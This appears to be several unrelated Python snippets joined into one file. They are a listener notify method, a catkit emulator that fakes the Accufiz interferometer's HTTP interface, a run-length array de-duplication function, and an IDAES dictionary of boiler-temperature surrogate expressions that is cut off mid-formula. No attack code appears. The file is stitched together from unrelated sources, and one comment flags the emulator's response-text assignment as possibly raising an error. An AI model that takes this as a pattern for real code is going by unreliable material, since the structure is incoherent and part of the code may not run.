    def notify(self, method, *args, **kwargs):
        """Invoke *method* on every registered listener with the given args."""
        for target in self.listeners:
            callback = getattr(target, method)
            callback(*args, **kwargs)

    def add_listener(self, listener):
        """Register *listener* (adapted to IAddrListener), at most once."""
        if listener in self.listeners:
            return
        self.listeners.append(IAddrListener(listener))
|
import os
import requests
from astropy.io import fits
import h5py
from catkit.hardware.FourDTechnology.Accufiz import Accufiz
from catkit.interfaces.Instrument import SimInstrument
class PoppyAccufizEmulator:
    """Poppy-backed emulator of the 4D Technology Accufiz HTTP interface.

    Mimics just enough of the ``requests`` get/post API for the Accufiz
    hardware driver to run against simulated optics.
    """

    def __init__(self, optics, *args, status_code=200, **kwargs):
        """
        Args:
            optics: simulated optical system used to synthesize measurements.
            status_code: HTTP status code stamped on every emulated response.
        """
        super().__init__(*args, **kwargs)
        self.data = None   # last simulated measurement, if any
        self.optics = optics
        # BUG FIX: the original line ended in a stray comma, which stored the
        # 1-tuple ``(status_code,)`` instead of the integer itself.
        self.status_code = status_code

    def get(self, url, params=None, **kwargs):
        """Emulate an HTTP GET: always answer "success" with self.status_code."""
        resp = requests.Response()
        # NOTE(review): requests.Response.text is a read-only property in
        # current requests releases, so this assignment may raise — confirm
        # against the pinned requests version.
        resp.text = "success"
        resp.status_code = self.status_code
        return resp

    def post(self, url, data=None, json=None, **kwargs):
        """Emulate an HTTP POST — not yet implemented (CATKIT-66)."""
        raise NotImplementedError("TODO: See CATKIT-66.")
        # Unreachable scaffolding kept from the original as a sketch of the
        # intended implementation (see CATKIT-66).
        command = os.path.basename(url)
        if command == "AverageMeasure":
            pass
            # self.data = optics.do_stuff()
        elif command == "SaveMeasurement":
            filepath = data["fileName"]
            if self.data is None:
                raise RuntimeError("No data taken to save.")
            # h5py.write(self.data, f"{filepath}.h5")
        else:
            raise NotImplementedError(f"The command '{command}' is not implemented.")
class Accufiz(Accufiz, SimInstrument):
    # Deliberately shadows the imported hardware ``Accufiz`` so the same class
    # name resolves to the simulated instrument; SimInstrument plugs
    # ``instrument_lib`` in as the backing (emulated) library.
    instrument_lib = PoppyAccufizEmulator
|
# -*- coding: utf-8 -*-
#############
#
# Copyright - Nirlendu Saha
#
# author - nirlendu@gmail.com
#
#############
def array_compaction(arr):
    """Collapse consecutive runs of equal elements down to one element.

    Note: this is run-length de-duplication (like Unix ``uniq``), not global
    de-duplication — ``[1, 2, 1]`` stays ``[1, 2, 1]``.  The original
    docstring's claim of "unique elements" only holds for sorted input.

    Args:
        arr: Any iterable of comparable elements.

    Returns:
        A list with each maximal run of equal consecutive elements replaced
        by a single occurrence; empty input yields an empty list.
    """
    # groupby yields one (key, run) pair per consecutive run, which replaces
    # the original hand-rolled last-index bookkeeping.
    from itertools import groupby
    return [key for key, _run in groupby(arr)]
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
data_dic = {
1: "(74904.4 * b.wall_temperature_waterwall[t, 1] \
+11301.8 * b.wall_temperature_waterwall[t, 2] \
+2427.54 * b.wall_temperature_waterwall[t, 3] \
+2891.35 * b.wall_temperature_waterwall[t, 4] \
-28320.8 * b.wall_temperature_waterwall[t, 5] \
+171.944 * b.wall_temperature_waterwall[t, 6] \
+14462.9 * b.wall_temperature_waterwall[t, 7] \
+677.973 * b.wall_temperature_waterwall[t, 8] \
-122.598 * b.wall_temperature_waterwall[t, 9] \
-300.609 * b.wall_temperature_waterwall[t, 12] \
+1770.05 * b.wall_temperature_platen[t] \
-169.562 * b.wall_temperature_roof[t] \
+1.92447e+06 * b.flowrate_coal_raw[t] \
+8.65298e+07 * b.mf_H2O_coal_raw[t] \
+1.46803e+09 * b.SR[t] \
-1.68637e+08 * b.SR_lf[t] \
-6385.5 * b.secondary_air_inlet.temperature[t] \
+952262 * b.ratio_PA2coal[t] \
-2.10696e+07 * log(b.wall_temperature_waterwall[t, 1]) \
-5.56721e+06 * log(b.wall_temperature_waterwall[t, 2]) \
-1.21448e+06 * log(b.wall_temperature_waterwall[t, 3]) \
-3.48806e+06 * log(b.wall_temperature_waterwall[t, 4]) \
+1.02069e+07 * log(b.wall_temperature_waterwall[t, 5]) \
-5.47775e+06 * log(b.wall_temperature_waterwall[t, 7]) \
-279177 * log(b.wall_temperature_waterwall[t, 8]) \
+111061 * log(b.wall_temperature_waterwall[t, 9]) \
-646506 * log(b.wall_temperature_platen[t]) \
+3.96004e+06 * log(b.flowrate_coal_raw[t]) \
+45092.6 * log(b.mf_H2O_coal_raw[t]) \
-3.9193e+08 * log(b.SR[t]) \
+1.61406e+08 * log(b.SR_lf[t]) \
-3.84139e+06 * log(b.secondary_air_inlet.temperature[t]) \
+556876 * log(b.ratio_PA2coal[t]) \
-9.88017e+07 * exp(b.mf_H2O_coal_raw[t]) \
-2.86022e+08 * exp(b.SR[t]) \
-35.7424 * b.wall_temperature_waterwall[t, 1]**2 \
+10.3165 * b.wall_temperature_waterwall[t, 5]**2 \
-4.85009 * b.wall_temperature_waterwall[t, 7]**2 \
-21190.8 * b.flowrate_coal_raw[t]**2 \
-5.00302e+08 * b.SR[t]**2 \
+179.062 * b.flowrate_coal_raw[t]**3 \
+2.33815e+08 * b.SR[t]**3 \
-74.5573 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-0.202341 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 3] \
-52.6317 * b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t] \
+0.243508 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-39.6689 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-0.320972 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 4] \
-9.03032 * b.wall_temperature_waterwall[t, 3]*b.flowrate_coal_raw[t] \
+1.08186 * b.wall_temperature_waterwall[t, 3]*b.secondary_air_inlet.temperature[t] \
+0.525868 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-39.011 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
+4489.28 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-629.837 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+44.344 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
+1.72535 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+796.63 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
+0.282511 * b.wall_temperature_waterwall[t, 7]*b.secondary_air_inlet.temperature[t] \
+0.447853 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 12] \
-0.343465 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_platen[t] \
-32.6091 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+1107.94 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
+0.0605128 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-0.463551 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
+6.50059 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
-1051.37 * b.wall_temperature_platen[t]*b.mf_H2O_coal_raw[t] \
-6.1049 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
-5465.56 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
+0.833308 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-1.75056e+06 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-183240 * b.flowrate_coal_raw[t]*b.SR[t] \
-310130 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+957.014 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-39804.2 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+4.49631e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+2.16414e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-19740 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-4.21302e+06 * b.SR[t]*b.SR_lf[t] \
+132221 * b.SR[t]*b.ratio_PA2coal[t] \
+20016.4 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-2318.51 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000979408 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.000719763 * (b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t])**2 \
+0.000572793 * (b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t])**2 \
-1.27643 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**2 \
+0.000450081 * (b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t])**2 \
+140272 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+666.822 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-3994.96 * (b.flowrate_coal_raw[t]*b.SR_lf[t])**2 \
-0.00660786 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+85.0348 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
+0.102891 * (b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t])**3 \
-7838.06 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**3)",
2: "(9402.37 * b.wall_temperature_waterwall[t, 1] \
+63618 * b.wall_temperature_waterwall[t, 2] \
+2118.88 * b.wall_temperature_waterwall[t, 3] \
+1821.84 * b.wall_temperature_waterwall[t, 4] \
-24586.5 * b.wall_temperature_waterwall[t, 5] \
+166.046 * b.wall_temperature_waterwall[t, 6] \
+695.921 * b.wall_temperature_waterwall[t, 7] \
+1070.12 * b.wall_temperature_waterwall[t, 8] \
-231.135 * b.wall_temperature_waterwall[t, 9] \
+18.6849 * b.wall_temperature_waterwall[t, 12] \
+1794.21 * b.wall_temperature_platen[t] \
+2842.9 * b.wall_temperature_roof[t] \
+2.04728e+06 * b.flowrate_coal_raw[t] \
+9.13283e+07 * b.mf_H2O_coal_raw[t] \
+6.91793e+06 * b.SR[t] \
+4.81359e+08 * b.SR_lf[t] \
-40341.5 * b.secondary_air_inlet.temperature[t] \
+1.1322e+06 * b.ratio_PA2coal[t] \
-4.24844e+06 * log(b.wall_temperature_waterwall[t, 1]) \
-1.67693e+07 * log(b.wall_temperature_waterwall[t, 2]) \
-1.2861e+06 * log(b.wall_temperature_waterwall[t, 3]) \
-4.45769e+06 * log(b.wall_temperature_waterwall[t, 4]) \
+9.0161e+06 * log(b.wall_temperature_waterwall[t, 5]) \
-537334 * log(b.wall_temperature_waterwall[t, 8]) \
+181486 * log(b.wall_temperature_waterwall[t, 9]) \
-715084 * log(b.wall_temperature_platen[t]) \
+4.61896e+06 * log(b.flowrate_coal_raw[t]) \
+30243.2 * log(b.mf_H2O_coal_raw[t]) \
-8.42989e+06 * log(b.SR[t]) \
-1.45952e+08 * log(b.SR_lf[t]) \
+9.65255e+06 * log(b.secondary_air_inlet.temperature[t]) \
+490346 * log(b.ratio_PA2coal[t]) \
-1.04352e+08 * exp(b.mf_H2O_coal_raw[t]) \
-1.24828e+08 * exp(b.SR_lf[t]) \
-30.804 * b.wall_temperature_waterwall[t, 2]**2 \
+9.2668 * b.wall_temperature_waterwall[t, 5]**2 \
-21962.3 * b.flowrate_coal_raw[t]**2 \
+185.889 * b.flowrate_coal_raw[t]**3 \
+0.0096263 * b.secondary_air_inlet.temperature[t]**3 \
-76.1054 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-81.3516 * b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t] \
+1570.34 * b.wall_temperature_waterwall[t, 2]*b.mf_H2O_coal_raw[t] \
-2440.82 * b.wall_temperature_waterwall[t, 2]*b.SR_lf[t] \
+0.527827 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-31.6806 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-11.9902 * b.wall_temperature_waterwall[t, 3]*b.flowrate_coal_raw[t] \
+1.17551 * b.wall_temperature_waterwall[t, 3]*b.secondary_air_inlet.temperature[t] \
+0.712584 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-8.98673 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
+6307.56 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+1.03784 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-3.53159 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
-1225.87 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+85.2083 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
+656.338 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
-674.09 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
-0.265762 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_platen[t] \
-8.30267 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+1227.37 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
+0.0526552 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-0.407706 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
+7.81514 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
-1118.85 * b.wall_temperature_platen[t]*b.mf_H2O_coal_raw[t] \
-15.2498 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
-4845.51 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
-3234.16 * b.wall_temperature_roof[t]*b.SR_lf[t] \
+0.69596 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-1.8204e+06 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-159924 * b.flowrate_coal_raw[t]*b.SR[t] \
-398436 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+1029.33 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-42896.7 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+3.55413e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+2.26223e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-20279.8 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-3.77353e+06 * b.SR[t]*b.SR_lf[t] \
+308.059 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+107358 * b.SR[t]*b.ratio_PA2coal[t] \
+20666.6 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-2564.62 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.00107543 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.000875275 * (b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t])**2 \
-1.75451 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**2 \
+149896 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+654.854 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-3875.11 * (b.flowrate_coal_raw[t]*b.SR_lf[t])**2 \
-0.00723196 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+91.9401 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
+0.0961783 * (b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t])**3 \
-8608.57 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**3)",
3: "(2825.25 * b.wall_temperature_waterwall[t, 1] \
+3496.16 * b.wall_temperature_waterwall[t, 2] \
+39611.4 * b.wall_temperature_waterwall[t, 3] \
+2064.54 * b.wall_temperature_waterwall[t, 4] \
-19353.7 * b.wall_temperature_waterwall[t, 5] \
+140.98 * b.wall_temperature_waterwall[t, 6] \
-95.4723 * b.wall_temperature_waterwall[t, 7] \
+180.791 * b.wall_temperature_waterwall[t, 8] \
+20.6861 * b.wall_temperature_waterwall[t, 12] \
-77.5609 * b.wall_temperature_platen[t] \
+1.76659e+06 * b.flowrate_coal_raw[t] \
+2.73809e+07 * b.mf_H2O_coal_raw[t] \
+1.30314e+07 * b.SR[t] \
+2.99323e+08 * b.SR_lf[t] \
-8992.63 * b.secondary_air_inlet.temperature[t] \
+743538 * b.ratio_PA2coal[t] \
-1.21925e+06 * log(b.wall_temperature_waterwall[t, 1]) \
-1.70788e+06 * log(b.wall_temperature_waterwall[t, 2]) \
-1.11283e+07 * log(b.wall_temperature_waterwall[t, 3]) \
-1.15967e+06 * log(b.wall_temperature_waterwall[t, 4]) \
+6.95686e+06 * log(b.wall_temperature_waterwall[t, 5]) \
+3.12918e+06 * log(b.flowrate_coal_raw[t]) \
+86928.8 * log(b.mf_H2O_coal_raw[t]) \
-1.11133e+07 * log(b.SR[t]) \
-8.27815e+07 * log(b.SR_lf[t]) \
+317858 * log(b.ratio_PA2coal[t]) \
-4.84182e+07 * exp(b.mf_H2O_coal_raw[t]) \
-969324 * exp(b.SR[t]) \
-8.1132e+07 * exp(b.SR_lf[t]) \
-20.0424 * b.wall_temperature_waterwall[t, 3]**2 \
+7.21081 * b.wall_temperature_waterwall[t, 5]**2 \
+0.177218 * b.wall_temperature_waterwall[t, 8]**2 \
+0.469474 * b.wall_temperature_platen[t]**2 \
-19318.5 * b.flowrate_coal_raw[t]**2 \
+3.33513 * b.secondary_air_inlet.temperature[t]**2 \
+149.518 * b.flowrate_coal_raw[t]**3 \
-29.4453 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-32.348 * b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t] \
+0.37361 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-49.1179 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-0.0559492 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 8] \
-24.6599 * b.wall_temperature_waterwall[t, 3]*b.flowrate_coal_raw[t] \
+1.0472 * b.wall_temperature_waterwall[t, 3]*b.secondary_air_inlet.temperature[t] \
+0.051371 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 8] \
+0.291925 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-7.09556 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
-579.937 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+30.4256 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
+0.187627 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_roof[t] \
+506.243 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
-0.209174 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_platen[t] \
-27.8211 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+808.58 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
+0.0378872 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-0.427984 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
+3.97146 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
-2.56524 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
-1.1316e+06 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-149208 * b.flowrate_coal_raw[t]*b.SR[t] \
-620763 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+692.429 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-27383.3 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+2.74367e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+2.19307e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-12923.6 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-1.89277e+06 * b.SR[t]*b.SR_lf[t] \
+538.573 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+91705.4 * b.SR[t]*b.ratio_PA2coal[t] \
+9695.45 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-1698.89 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000466813 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.000489048 * (b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t])**2 \
-0.0629385 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**2 \
+0.000414 * (b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t])**2 \
+94334.8 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+647.348 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00513905 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+57.4901 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
-5271.02 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**3)",
4: "(30998 * b.wall_temperature_waterwall[t, 1] \
+2457.99 * b.wall_temperature_waterwall[t, 2] \
+1137.13 * b.wall_temperature_waterwall[t, 3] \
+19608.1 * b.wall_temperature_waterwall[t, 4] \
-19918.2 * b.wall_temperature_waterwall[t, 5] \
+919.01 * b.wall_temperature_waterwall[t, 6] \
+369.947 * b.wall_temperature_waterwall[t, 7] \
+646.454 * b.wall_temperature_waterwall[t, 8] \
+102.897 * b.wall_temperature_waterwall[t, 10] \
+24.8228 * b.wall_temperature_waterwall[t, 12] \
+1739.59 * b.wall_temperature_platen[t] \
+1.89204e+06 * b.flowrate_coal_raw[t] \
+6.68693e+07 * b.mf_H2O_coal_raw[t] \
+4.63505e+06 * b.SR[t] \
+4.53751e+08 * b.SR_lf[t] \
+1612.6 * b.secondary_air_inlet.temperature[t] \
+924842 * b.ratio_PA2coal[t] \
-1.07435e+07 * log(b.wall_temperature_waterwall[t, 1]) \
-1.48504e+06 * log(b.wall_temperature_waterwall[t, 2]) \
-750102 * log(b.wall_temperature_waterwall[t, 3]) \
-7.28634e+06 * log(b.wall_temperature_waterwall[t, 4]) \
+7.19016e+06 * log(b.wall_temperature_waterwall[t, 5]) \
-342011 * log(b.wall_temperature_waterwall[t, 6]) \
-465932 * log(b.wall_temperature_waterwall[t, 7]) \
-275633 * log(b.wall_temperature_waterwall[t, 8]) \
-500395 * log(b.wall_temperature_platen[t]) \
+3.33092e+06 * log(b.flowrate_coal_raw[t]) \
-1.06661e+07 * log(b.SR[t]) \
-1.71633e+08 * log(b.SR_lf[t]) \
-3.18827e+06 * log(b.secondary_air_inlet.temperature[t]) \
-8.32439e+07 * exp(b.mf_H2O_coal_raw[t]) \
-1.05477e+08 * exp(b.SR_lf[t]) \
-10.3499 * b.wall_temperature_waterwall[t, 1]**2 \
-12.7144 * b.wall_temperature_waterwall[t, 4]**2 \
+7.8685 * b.wall_temperature_waterwall[t, 5]**2 \
-19144.9 * b.flowrate_coal_raw[t]**2 \
+143.33 * b.flowrate_coal_raw[t]**3 \
-24.1862 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-28.4264 * b.wall_temperature_waterwall[t, 1]*b.mf_H2O_coal_raw[t] \
-312.37 * b.wall_temperature_waterwall[t, 1]*b.SR_lf[t] \
-3.62923 * b.wall_temperature_waterwall[t, 2]*b.flowrate_coal_raw[t] \
+0.58587 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-20.9999 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
-4.26059 * b.wall_temperature_waterwall[t, 3]*b.flowrate_coal_raw[t] \
+0.849726 * b.wall_temperature_waterwall[t, 3]*b.secondary_air_inlet.temperature[t] \
+0.383348 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-31.1716 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
+6795.15 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-0.334707 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 6] \
+0.0296533 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_roof[t] \
-6.75789 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
-887.887 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+54.121 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
+0.390219 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_roof[t] \
+617.963 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
-354.236 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
+0.668885 * b.wall_temperature_waterwall[t, 7]*b.secondary_air_inlet.temperature[t] \
+0.368313 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 10] \
-0.224167 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_platen[t] \
-32.5371 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+944.267 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-0.444565 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_platen[t] \
+482.957 * b.wall_temperature_waterwall[t, 11]*b.mf_H2O_coal_raw[t] \
-0.448545 * b.wall_temperature_platen[t]*b.wall_temperature_roof[t] \
-92.9318 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-965339 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-238814 * b.flowrate_coal_raw[t]*b.SR[t] \
-656822 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+742.242 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-26766.3 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
-1.27395e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
+2.30581e+07 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-13952.1 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-269639 * b.mf_H2O_coal_raw[t]*b.ratio_PA2coal[t] \
+841.556 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+84459.4 * b.SR[t]*b.ratio_PA2coal[t] \
+7494.08 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-1672.75 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000370175 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
-1.84302 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**2 \
+0.000463608 * (b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t])**2 \
+45660.1 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+978.377 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00577998 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+51.3598 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
+1.03552e+07 * (b.mf_H2O_coal_raw[t]*b.SR[t])**2)",
5: "(1381.36 * b.wall_temperature_waterwall[t, 1] \
+2323.67 * b.wall_temperature_waterwall[t, 2] \
+16.5773 * b.wall_temperature_waterwall[t, 3] \
+1352.22 * b.wall_temperature_waterwall[t, 4] \
-16466.5 * b.wall_temperature_waterwall[t, 5] \
+899.714 * b.wall_temperature_waterwall[t, 6] \
+3.93998 * b.wall_temperature_waterwall[t, 7] \
+1266.5 * b.wall_temperature_waterwall[t, 8] \
+27.0207 * b.wall_temperature_waterwall[t, 12] \
+1538.23 * b.wall_temperature_platen[t] \
+2873.09 * b.wall_temperature_roof[t] \
+1.97605e+06 * b.flowrate_coal_raw[t] \
-1.23146e+08 * b.mf_H2O_coal_raw[t] \
+7.90727e+06 * b.SR[t] \
-8.28156e+07 * b.SR_lf[t] \
+8409.65 * b.secondary_air_inlet.temperature[t] \
+771488 * b.ratio_PA2coal[t] \
-512140 * log(b.wall_temperature_waterwall[t, 1]) \
-960400 * log(b.wall_temperature_waterwall[t, 2]) \
-1.69396e+06 * log(b.wall_temperature_waterwall[t, 5]) \
-578390 * log(b.wall_temperature_waterwall[t, 8]) \
-500164 * log(b.wall_temperature_platen[t]) \
+3.27151e+06 * log(b.flowrate_coal_raw[t]) \
-207751 * log(b.mf_H2O_coal_raw[t]) \
-1.3498e+07 * log(b.SR[t]) \
+7.59142e+07 * log(b.SR_lf[t]) \
-3.4224e+06 * log(b.secondary_air_inlet.temperature[t]) \
+1.08294e+08 * exp(b.mf_H2O_coal_raw[t]) \
+0.728811 * b.wall_temperature_waterwall[t, 4]**2 \
-18833.1 * b.flowrate_coal_raw[t]**2 \
-9.85614e+07 * b.mf_H2O_coal_raw[t]**2 \
+120.533 * b.flowrate_coal_raw[t]**3 \
-0.0492326 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 11] \
